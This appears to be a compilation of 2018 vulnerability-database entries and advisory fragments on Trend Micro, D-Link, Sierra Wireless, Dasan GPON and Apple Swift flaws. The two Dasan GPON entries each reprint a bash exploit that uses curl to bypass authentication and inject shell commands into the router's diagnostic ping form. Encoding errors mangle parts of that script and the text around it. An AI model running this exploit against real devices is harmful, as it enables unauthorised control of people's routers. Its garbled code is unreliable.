For the detailed security status of linux please refer to its security
tracker page at:
https://security-tracker.debian.org/tracker/linux
Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/
Mailing list: debian-security-announce@lists.debian.org
-----BEGIN PGP SIGNATURE-----
iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAlryHFFfFIAAAAAALgAo
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND
z0SMQA/9HoJDt2OdyqqtfNUuWfP3sgGV1QVjIJnF39unKRdIaGw9m0RHQUu1G3rC
cgxcYcpQ0h10Yy5KVh4APqt55K7aVWVQT6xB0yx2VddMEwwl3rp2r/eL7EtoOkQT
zZW5JponzlEAjC9uGk7CouA7z/qFtd5awufFhAjMF5eL4ZQ6pG8wWEbae6DbU9nz
c7F+okC4hL6yPuWVEWzTRUFK1W0hs2N+VQgHV/afZaMAAooeZJDJeq1Hn/PVYvwJ
IHSOs01+kn0OUFHkVRA7kVdFAYUJlfhsDcXd9nB/lkxhc/HNI1g/dK76mRxjsiMo
pJlkPbEmZlOtmNG7vogxEp72ab24j2CITIHiID7ftZH5R/I2CSxp2dIzRVKdmP6P
tsfh/KcpUMNwwiPiGed1DMCjtsHOodBOkLtVsoHHJVMZg2xqfCrlqNRUn9o+0DcR
gO7HBsWG9K1qvSBWuRtQLT8QP00P3dSdhHmfWyfN8eJxTot+WJuMF/o+jbF6GGrZ
lPmzWqg4oL7jvQO8nlEkatjIFejEg0jmt+rCXyEbK8Uc9xjJk35GKIZne5X09BFe
36zY7HbMlPvLP/VHSb6fcPBpQo/HuG0/htAB1HpWS1fPrth1J76g2EmwFSG5Lo51
IRxTXP4UZuOL1sJHQ80220tThKs2dk1Yy77dKk8qQiQ2nC2JgNs=
=CskH
-----END PGP SIGNATURE-----
| VAR-201805-0272 | CVE-2018-10351 | Trend Micro Email Encryption Gateway In SQL Injection vulnerability |
CVSS V2: 9.0 CVSS V3: 8.8 Severity: HIGH |
A vulnerability in Trend Micro Email Encryption Gateway 5.5 could allow a remote attacker to execute arbitrary SQL statements on vulnerable installations due to a flaw in the formRegistration2 class. Authentication is required to exploit this vulnerability. A crafted Client field in ppreg files can trigger execution of SQL queries composed from a user-supplied string. An attacker can leverage this vulnerability to execute code under the context of root. Multiple SQL-injection vulnerabilities
2. A command-injection vulnerability
3. An insecure authentication weakness
Exploiting these issues could allow an attacker to access or modify data, or exploit latent vulnerabilities in the underlying database, execute arbitrary command, bypass authentication mechanism, execute arbitrary code and obtain sensitive information. This may aid in further attacks.
Email Encryption Gateway 5.5 Build 1111 and prior are vulnerable. There is an SQL injection vulnerability in the formRegistration2 class in Trend Micro TMEEG version 5.5
| VAR-201805-0273 | CVE-2018-10352 | Trend Micro Email Encryption Gateway In SQL Injection vulnerability |
CVSS V2: 6.5 CVSS V3: 8.8 Severity: HIGH |
A vulnerability in Trend Micro Email Encryption Gateway 5.5 could allow a remote attacker to execute arbitrary SQL statements on vulnerable installations due to a flaw in the formConfiguration class. Authentication is required to exploit this vulnerability. The issue results from the lack of proper validation of user-supplied strings before using them to construct SQL queries. An attacker can leverage this vulnerability to execute code under the context of root. Multiple SQL-injection vulnerabilities
2. A command-injection vulnerability
3. An insecure authentication weakness
Exploiting these issues could allow an attacker to access or modify data, or exploit latent vulnerabilities in the underlying database, execute arbitrary command, bypass authentication mechanism, execute arbitrary code and obtain sensitive information. This may aid in further attacks. There is an SQL injection vulnerability in the formConfiguration class in Trend Micro TMEEG version 5.5
| VAR-201805-0275 | CVE-2018-10354 | Trend Micro Email Encryption Gateway Command injection vulnerability |
CVSS V2: 9.0 CVSS V3: 8.8 Severity: HIGH |
A command injection remote command execution vulnerability in Trend Micro Email Encryption Gateway 5.5 could allow a remote attacker to execute arbitrary code on vulnerable installations due to a flaw in the LauncherServer. Authentication is required to exploit this vulnerability. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code under the context of root. Multiple SQL-injection vulnerabilities
2. A command-injection vulnerability
3. This may aid in further attacks
| VAR-201805-0274 | CVE-2018-10353 | Trend Micro Email Encryption Gateway In SQL Injection vulnerability |
CVSS V2: 4.0 CVSS V3: 6.5 Severity: MEDIUM |
A SQL injection information disclosure vulnerability in Trend Micro Email Encryption Gateway 5.5 could allow a remote attacker to disclose sensitive information on vulnerable installations due to a flaw in the formChangePass class. Authentication is required to exploit this vulnerability. When parsing the username parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this in conjunction with other vulnerabilities to disclose sensitive information under the context of the database. Multiple SQL-injection vulnerabilities
2. A command-injection vulnerability
3. An insecure authentication weakness
Exploiting these issues could allow an attacker to access or modify data, or exploit latent vulnerabilities in the underlying database, execute arbitrary command, bypass authentication mechanism, execute arbitrary code and obtain sensitive information. This may aid in further attacks
| VAR-201805-0703 | CVE-2018-10746 | D-Link DSL-3782 EU Buffer error vulnerability |
CVSS V2: 9.0 CVSS V3: 8.8 Severity: HIGH |
An issue was discovered on D-Link DSL-3782 EU 1.01 devices. An authenticated user can pass a long buffer as a 'get' parameter to the '/userfs/bin/tcapi' binary (in the Diagnostics component) using the 'get <node_name attr>' function and cause memory corruption. Furthermore, it is possible to redirect the flow of the program and execute arbitrary code. D-Link DSL-3782 EU Contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. D-LinkDSL-3782 is a wireless router product from D-Link. A buffer overflow vulnerability exists in the /userfs/bin/tcapi binary in D-LinkDSL-3782
| VAR-201805-0706 | CVE-2018-10749 | D-Link DSL-3782 EU Buffer error vulnerability |
CVSS V2: 9.0 CVSS V3: 8.8 Severity: HIGH |
An issue was discovered on D-Link DSL-3782 EU 1.01 devices. An authenticated user can pass a long buffer as a 'commit' parameter to the '/userfs/bin/tcapi' binary (in the Diagnostics component) using the 'commit <node_name>' function and cause memory corruption. Furthermore, it is possible to redirect the flow of the program and execute arbitrary code. D-Link DSL-3782 EU Contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. D-LinkDSL-3782 is a wireless router product from D-Link. A buffer overflow vulnerability exists in the /userfs/bin/tcapi binary in D-LinkDSL-3782
| VAR-201805-0704 | CVE-2018-10747 | D-Link DSL-3782 EU Buffer error vulnerability |
CVSS V2: 9.0 CVSS V3: 8.8 Severity: HIGH |
An issue was discovered on D-Link DSL-3782 EU 1.01 devices. An authenticated user can pass a long buffer as an 'unset' parameter to the '/userfs/bin/tcapi' binary (in the Diagnostics component) using the 'unset <node_name>' function and cause memory corruption. Furthermore, it is possible to redirect the flow of the program and execute arbitrary code. D-Link DSL-3782 EU Contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. D-LinkDSL-3782 is a wireless router product from D-Link. A buffer overflow vulnerability exists in the /userfs/bin/tcapi binary in D-LinkDSL-3782
| VAR-201805-0707 | CVE-2018-10750 | D-Link DSL-3782 EU Buffer error vulnerability |
CVSS V2: 9.3 CVSS V3: 8.8 Severity: HIGH |
An issue was discovered on D-Link DSL-3782 EU 1.01 devices. An authenticated user can pass a long buffer as a 'staticGet' parameter to the '/userfs/bin/tcapi' binary (in the Diagnostics component) using the 'staticGet <node_name attr>' function and cause memory corruption. Furthermore, it is possible to redirect the flow of the program and execute arbitrary code. D-Link DSL-3782 EU Contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. D-LinkDSL-3782 is a wireless router product from D-Link. A buffer overflow vulnerability exists in the /userfs/bin/tcapi binary in D-LinkDSL-3782EU1.01
| VAR-201805-0705 | CVE-2018-10748 | D-Link DSL-3782 EU Buffer error vulnerability |
CVSS V2: 9.0 CVSS V3: 8.8 Severity: HIGH |
An issue was discovered on D-Link DSL-3782 EU 1.01 devices. An authenticated user can pass a long buffer as a 'show' parameter to the '/userfs/bin/tcapi' binary (in the Diagnostics component) using the 'show <node_name>' function and cause memory corruption. Furthermore, it is possible to redirect the flow of the program and execute arbitrary code. D-Link DSL-3782 EU Contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. D-LinkDSL-3782 is a wireless router product from D-Link. A buffer overflow vulnerability exists in the /userfs/bin/tcapi binary in D-LinkDSL-3782
| VAR-201805-0371 | CVE-2018-10251 | plural Sierra Wireless Vulnerabilities related to authorization, authority, and access control in firmware of routers |
CVSS V2: 10.0 CVSS V3: 9.8 Severity: CRITICAL |
A vulnerability in Sierra Wireless AirLink GX400, GX440, ES440, and LS300 routers with firmware before 4.4.7 and GX450, ES450, RV50, RV50X, MP70, and MP70E routers with firmware before 4.9.3 could allow an unauthenticated remote attacker to execute arbitrary code and gain full control of an affected system, including issuing commands with root privileges. plural Sierra Wireless Router firmware contains vulnerabilities related to authorization, authority, and access control.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. SierraWirelessAirLinkGX400 and others are router products of SierraWireless Canada. There are security holes in several SierraWireless products. Sierra Wireless AirLink GX400 and so on are the router products of Canadian Sierra Wireless company. The following products and versions are affected: Sierra Wireless AirLink GX400 with firmware prior to 4.4.7; Sierra Wireless AirLink GX440 with firmware prior to 4.4.7; Sierra Wireless AirLink ES440 with firmware prior to 4.4.7; Sierra Wireless AirLink LS300 with firmware prior to 4.9.3; Sierra Wireless AirLink GX450 with firmware prior to 4.9.3; Sierra Wireless AirLink ES450 with firmware prior to 4.9.3; Sierra Wireless AirLink RV50 with firmware prior to 4.9.3; Sierra Wireless AirLink RV50X with firmware prior to .3; Sierra Wireless AirLink MP70 with firmware prior to 4.9.3; Sierra Wireless AirLink MP70E with firmware prior to 4.9.3
| VAR-201805-0208 | CVE-2017-15043 | plural Sierra Wireless Vulnerability related to input confirmation in firmware of routers |
CVSS V2: 9.0 CVSS V3: 8.8 Severity: HIGH |
A vulnerability in Sierra Wireless AirLink GX400, GX440, ES440, and LS300 routers with firmware before 4.4.5 and GX450, ES450, RV50, RV50X, MP70, and MP70E routers with firmware before 4.9 could allow an authenticated remote attacker to execute arbitrary code and gain full control of an affected system, including issuing commands with root privileges. This vulnerability is due to insufficient input validation on user-controlled input in an HTTP request to the targeted device. An attacker in possession of router login credentials could exploit this vulnerability by sending a crafted HTTP request to an affected system. plural Sierra Wireless Vulnerability related to input validation exists in the firmware of routers made by the manufacturer.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. SierraWirelessAirLinkGX400 and others are router products of SierraWireless Canada
| VAR-201805-0232 | CVE-2018-10641 | D-Link DIR-601 Vulnerabilities related to certificate and password management |
CVSS V2: 6.8 CVSS V3: 8.1 Severity: HIGH |
D-Link DIR-601 A1 1.02NA devices do not require the old password for a password change, which occurs in cleartext. D-Link DIR-601 Contains vulnerabilities related to certificate and password management.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. D-LinkDIR-601 is a wireless router product from D-Link. A security vulnerability exists in the D-LinkDIR-601A11.02NA release, which is caused by the fact that the user does not need the current password when changing the password and the program passes the new username and password in clear text. An attacker could exploit the vulnerability to obtain information by intercepting passed parameters. There is a security vulnerability in D-Link DIR-601 A1 version 1.02NA.
------------------------------------------
[Additional Information]
Insecure Authentication Practices in D-LINK DIR-601 Router, Hardware
version A1, Firmware Version 1.02NA
When logging into the router, the authentication module passes the
username and password BASE64 encoded vice encrypted. There is also no support for
HTTPS connections to the router.
Due to no schedule viability D-Link asks that two items are mentioned in
disclosure:
a) For this out of service router, users are encouraged too used DD-WRT
firmware here <http://www.dd-wrt.com/site/support/router-database>
b) They can contact support@dlink.com for the latest information on
updates.
------------------------------------------
[VulnerabilityType Other]
Weak Authentication and No HTTPS support
------------------------------------------
[Vendor of Product]
D-Link
------------------------------------------
[Affected Product Code Base]
DIR 601 - Hardware A1, Firmware 1.02NA
------------------------------------------
[Affected Component]
Login, Password Changing
------------------------------------------
[Attack Type]
Context-dependent
------------------------------------------
[Impact Information Disclosure]
true
------------------------------------------
[Attack Vectors]
To exploit this, an attacker must have a proxy or man-in-the-middle attack
completed and be able to discern the URLs to intercept passed parameters.
------------------------------------------
[Has vendor confirmed or acknowledged the vulnerability?]
true
------------------------------------------
[Remediation]
Due to no schedule viability D-Link asks that two items are mentioned in
disclosure:
a) For this out of service router, users are encouraged too used DD-WRT
firmware here
b) They can contact support@dlink.com for the latest information on
updates.
------------------------------------------
[References]
http://us.dlink.com/security-advisories/
<http://us.dlink.com/security-advisories/>
https://advancedpersistentsecurity.net/cve-2018-10641/
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10641
Joe Gray
| VAR-201805-0262 | CVE-2018-10561 | Dasan GPON home router Authentication vulnerability |
CVSS V2: 7.5 CVSS V3: 9.8 Severity: CRITICAL |
An issue was discovered on Dasan GPON home routers. It is possible to bypass authentication simply by appending "?images" to any URL of the device that requires authentication, as demonstrated by the /menu.html?images/ or /GponForm/diag_FORM?images/ URI. One can then manage the device. Dasan GPON home router Contains an authentication vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. An attacker could exploit the vulnerability by bypassing the vulnerability by adding \342\200\230?images\342\200\231 to any of the device's URLs. Multiple Dasan GPON Routers is prone to an authentication-bypass vulnerability and a command-injection vulnerability.
An attacker can exploit these issues to bypass authentication or execute arbitrary commands in the context of the affected device. #!/bin/bash
echo "[+] Sending the Commanda| "
# We send the commands with two modes backtick (`) and semicolon (;) because different models trigger on different devices
curl -k -d "XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=\`$2\`;$2&ipv=0" $1/GponForm/diag_Form?images/ 2>/dev/null 1>/dev/null
echo "[+] Waitinga|."
sleep 3
echo "[+] Retrieving the ouputa|."
curl -k $1/diag.html?images/ 2>/dev/null | grep adiag_result = a | sed -e as/\\n/\n/ga
| VAR-201805-0263 | CVE-2018-10562 | Dasan GPON home routers Command injection vulnerability |
CVSS V2: 7.5 CVSS V3: 9.8 Severity: CRITICAL |
An issue was discovered on Dasan GPON home routers. Command Injection can occur via the dest_host parameter in a diag_action=ping request to a GponForm/diag_Form URI. Because the router saves ping results in /tmp and transmits them to the user when the user revisits /diag.html, it's quite simple to execute commands and retrieve their output. Dasan GPON home routers Contains a command injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. An attacker could use the vulnerability to execute a command and retrieve the output by sending a diag_action=ping request with the \342\200\230dest_host\342\200\231 parameter to GponForm/diag_FormURI. Multiple Dasan GPON Routers is prone to an authentication-bypass vulnerability and a command-injection vulnerability.
An attacker can exploit these issues to bypass authentication or execute arbitrary commands in the context of the affected device. #!/bin/bash
echo "[+] Sending the Commanda| "
# We send the commands with two modes backtick (`) and semicolon (;) because different models trigger on different devices
curl -k -d "XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=\`$2\`;$2&ipv=0" $1/GponForm/diag_Form?images/ 2>/dev/null 1>/dev/null
echo "[+] Waitinga|."
sleep 3
echo "[+] Retrieving the ouputa|."
curl -k $1/diag.html?images/ 2>/dev/null | grep adiag_result = a | sed -e as/\\n/\n/ga
| VAR-201805-0276 | CVE-2018-10355 | Trend Micro Email Encryption Gateway Vulnerabilities related to certificate and password management |
CVSS V2: 1.9 CVSS V3: 7.0 Severity: HIGH |
An authentication weakness vulnerability in Trend Micro Email Encryption Gateway 5.5 could allow an attacker to recover user passwords on vulnerable installations due to a flaw in the DBCrypto class. An attacker must first obtain access to the user database on the target system in order to exploit this vulnerability. When storing user passwords, the process stores them in a recoverable format using a hard-coded key. An attacker can then leverage this vulnerability to decrypt existing passwords. Multiple SQL-injection vulnerabilities
2. A command-injection vulnerability
3. An insecure authentication weakness
Exploiting these issues could allow an attacker to access or modify data, or exploit latent vulnerabilities in the underlying database, execute arbitrary command, bypass authentication mechanism, execute arbitrary code and obtain sensitive information. This may aid in further attacks
| VAR-201806-1464 | CVE-2018-4220 | Apple Swift of Ubuntu for Swift Component vulnerable to arbitrary code execution in privileged context |
CVSS V2: 9.3 CVSS V3: 8.8 Severity: HIGH |
An issue was discovered in certain Apple products. Swift before 4.1.1 Security Update 2018-001 is affected. The issue involves the "Swift for Ubuntu" component. It allows attackers to execute arbitrary code in a privileged context because write and execute permissions are enabled during library loading. Apple Swift is prone to an arbitrary code-execution vulnerability. Failed attempts will likely cause a denial-of-service condition. Apple Swift is a programming language for macOS, iOS, watchOS and tvOS developed by Apple.
This issue was addressed with improved permissions.
Information will also be posted to the Apple Security Updates
web site: https://support.apple.com/kb/HT201222 and the Swift
announcements section on the forum:
https://forums.swift.org/c/general-announce
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
iQJdBAEBCgBHFiEEcuX4rtoRe4X62yWlg6PvjDRstEYFAlrsmUcpHHByb2R1Y3Qt
c2VjdXJpdHktbm9yZXBseUBsaXN0cy5hcHBsZS5jb20ACgkQg6PvjDRstEbkbA//
TuLWltNrBXakVq4NY1wBZ0P+/SYUlw312FHtWrtDcAKNykyfED9bA8AnG0Ux3d1g
MdJqT9KkRLXOSunWgiXG8IpWH9KCApeWDV/AE4p6isgOzE4orx02QeHzu9zc7RN6
jBVlfJaGCpTzVuFJRiEimyupjbd5db33N8raRmLxMUKTn0jVjG6ARNS7G+rpUygE
4Dy/lwP05tLWffK1O+w0oihfGsxEl1xiNAcErHTk6Fb/ZVHiITXsuOw9E775dRsM
5fkuyVU6uyhzVNWXkJ9AhOlld7t6gBFNCADMsi+jSqT6EYCHKODBXrar0CfafrsP
edAvUE6PopD2i5ee7msdB+WxTLf1J/WPqT4kyD9kD4SwPeE6eN8evTqubNsOF+jc
cwhsgFuH34AvsoCea5i5v9mwLpjWodgq6OyMkF0Ee3shVx8HRo2Gm/sjj/THJq/G
76Wkfb2bOcVJ3ncDAHAHO3tWfrqZYD9+Eg5hQLwyRDpBKTBzl9R5yXQZFa0naLdC
1iEzXtom+IeXn9jYqE79qOUkBSMzZQ95j98CklKGfKMz8UtfOzM2+mmwCSx5CAwC
H92XBJ7wMyg6EEgByPX89Y4oyg9Ng+reTtAQD2TC9rygEKh5LMJxlhCM+CLDWEqC
ys0NCk7M9izqbAZ4zsf+D+Ml/4h71iDBae92JURjhas=
=sqwr
-----END PGP SIGNATURE-----